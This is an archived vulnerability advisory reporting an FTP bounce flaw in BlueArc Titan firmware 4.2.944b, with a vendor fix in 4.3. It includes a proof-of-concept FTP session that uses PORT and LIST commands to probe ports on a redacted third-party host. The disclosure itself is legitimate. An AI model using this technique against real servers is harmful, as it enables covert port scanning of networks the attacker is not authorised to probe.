TUCoPS :: Network Appliances :: tb10460.htm

BlueArc Firmware 4.2.944b FTP bounce
BlueArc Firmware 4.2.944b FTP bounce
BlueArc Firmware 4.2.944b FTP bounce


Hi all,

BlueArc Titan 2x00 devices running firmware version 4.2.944b are
susceptible to FTP bounce attacks. The vendor has confirmed this, and
a fix is available in the 4.3 firmware.

Example:
First connect to SSH, success
Then to MySQL, no success
Then to telnet, no success

[user@localhost ~]$ ftp bluearctitan
Connected to bluearctitan.
220 Server ready (BlueArc-FTPD v1.0)
Name (bluearctitan:user): anonymous
331 Username okay; need password
Password:
230 User logged in, proceed
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote "PORT xxx,xxx,xxx,xxx,0,22"
200 PORT Command Okay
ftp> quote "LIST"
150 File status okay; about to open data connection
226 Transfer Complete
ftp> quote "PORT xxx,xxx,xxx,xxx,12,234"
200 PORT Command Okay
ftp> quote "LIST"
150 File status okay; about to open data connection
425 Can't open data connection (dtp_list)
ftp> quote "PORT xxx,xxx,xxx,xxx,0,23"
200 PORT Command Okay
ftp> quote "LIST"
150 File status okay; about to open data connection
425 Can't open data connection (dtp_list)

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH